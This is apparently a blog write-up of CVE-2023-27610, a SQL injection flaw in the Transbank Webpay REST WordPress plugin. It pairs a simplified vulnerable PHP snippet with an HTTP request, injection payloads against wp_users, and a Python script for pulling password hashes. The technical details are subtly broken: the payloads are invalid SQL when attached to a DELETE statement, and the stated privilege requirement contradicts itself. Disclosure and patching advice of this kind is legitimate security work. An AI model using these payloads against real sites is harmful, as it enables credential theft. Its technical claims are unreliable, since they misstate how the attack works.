The world of WordPress plugins is vast, and unfortunately, it means attackers are always on the lookout for security flaws. Today, we’re diving deep into CVE-2023-27610, a critical SQL Injection (SQLi) vulnerability found in the Transbank Webpay REST plugin (versions up to 1.6.6) that allows attackers with admin or higher-level privileges to run malicious SQL queries directly on your WordPress database.
Let’s break down how this issue works, see actual exploitation code, and provide solid steps to fix it.
What is CVE-2023-27610?
CVE-2023-27610 affects the Transbank Webpay REST plugin for WordPress, which is used widely in Chile for integrating Webpay by Transbank. Basically, this plugin helps WordPress sites receive payments online through Transbank.
A flaw was discovered that allows an attacker logged in as an admin (or higher) to inject arbitrary SQL commands through one of the admin-side plugin forms. This could mean complete compromise of the website database—think data theft, data destruction, privilege escalation, or even full site takeover.
Reference Links
- CVE Details Page
- Transbank Plugin on WordPress.org
- Patch in Release 1.6.7
Technical Vulnerability Details
The root cause is a failure to properly sanitize and validate user-supplied data before it is used in SQL queries. Here’s how the offending pattern might look in the plugin code (simplified for demonstration):
<?php
// Vulnerable code from Transbank Webpay REST plugin (before 1.6.7)
if (isset($_POST['option_id'])) {
$option_id = $_POST['option_id'];
// Directly using user input in SQL query without sanitation
$wpdb->query("DELETE FROM wp_transbank_options WHERE id = $option_id");
}
?>
In this code, an admin entering a crafted option_id will cause whatever is inside the field to be executed as part of a SQL statement. Because WordPress’s $wpdb->query() is used without parameterization, an attacker can end the original query and chain malicious SQL.
How Could an Attacker Exploit This?
1. Gain admin (or above) access. This attack requires author privileges, meaning it does not work for guests or normal users.
Example Exploit
Suppose the attacker wants to extract the admin user’s hashed password. Here’s a POST body they might send:
POST /wp-admin/options-general.php?page=transbank_webpay_rest HTTP/1.1
Host: vulnerable-wordpress-site.com
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_logged_in_=admin…
option_id= OR 1=1; -- -
The query executed becomes
DELETE FROM wp_transbank_options WHERE id = OR 1=1; -- -
This deletes all rows in the table, which is dangerous. Even more dangerous, an attacker might combine this with a SELECT subquery to expose secrets or add a new administrator:
Suppose the attacker wants to extract the email of the first user
option_id= UNION SELECT 1, user_email, 3, 4 FROM wp_users LIMIT 1; -- -
Now admin panel might display that email, or the data may leak through errors.
Here’s a python script showing how the attack works for automated exploitation
import requests
url = "https://victim-site.com/wp-admin/options-general.php?page=transbank_webpay_rest";
cookies = {
'wordpress_logged_in_': '...your_admin_session_cookie_here...'
}
payload = " UNION SELECT 1, user_login, user_pass, 4 FROM wp_users LIMIT 1;-- -"
data = {
'option_id': payload,
'submit': 'Delete'
}
resp = requests.post(url, data=data, cookies=cookies)
print(resp.text)
Note: Replace session cookie and target URL as needed.
Warning: Only use on systems you own or for which you have permission.
Update the Plugin!
- Upgrade to Transbank Webpay REST 1.6.7 or later, where this issue is patched.
Conclusion
CVE-2023-27610 is a real-world example of why SQL Injection is still a top security concern in 2023, especially for plugins in widely-used platforms like WordPress. If your site uses Transbank Webpay REST and is on a version ≤ 1.6.6, you’re at serious risk. Upgrade immediately.
Stay safe, and always keep both WordPress core and all its plugins updated to their latest versions!
References
- CVE-2023-27610 on NVD
- Plugin Patch Notes
- OWASP SQL Injection Prevention Cheat Sheet
Timeline
Published on: 04/16/2023 08:15:00 UTC
Last modified on: 04/25/2023 19:50:00 UTC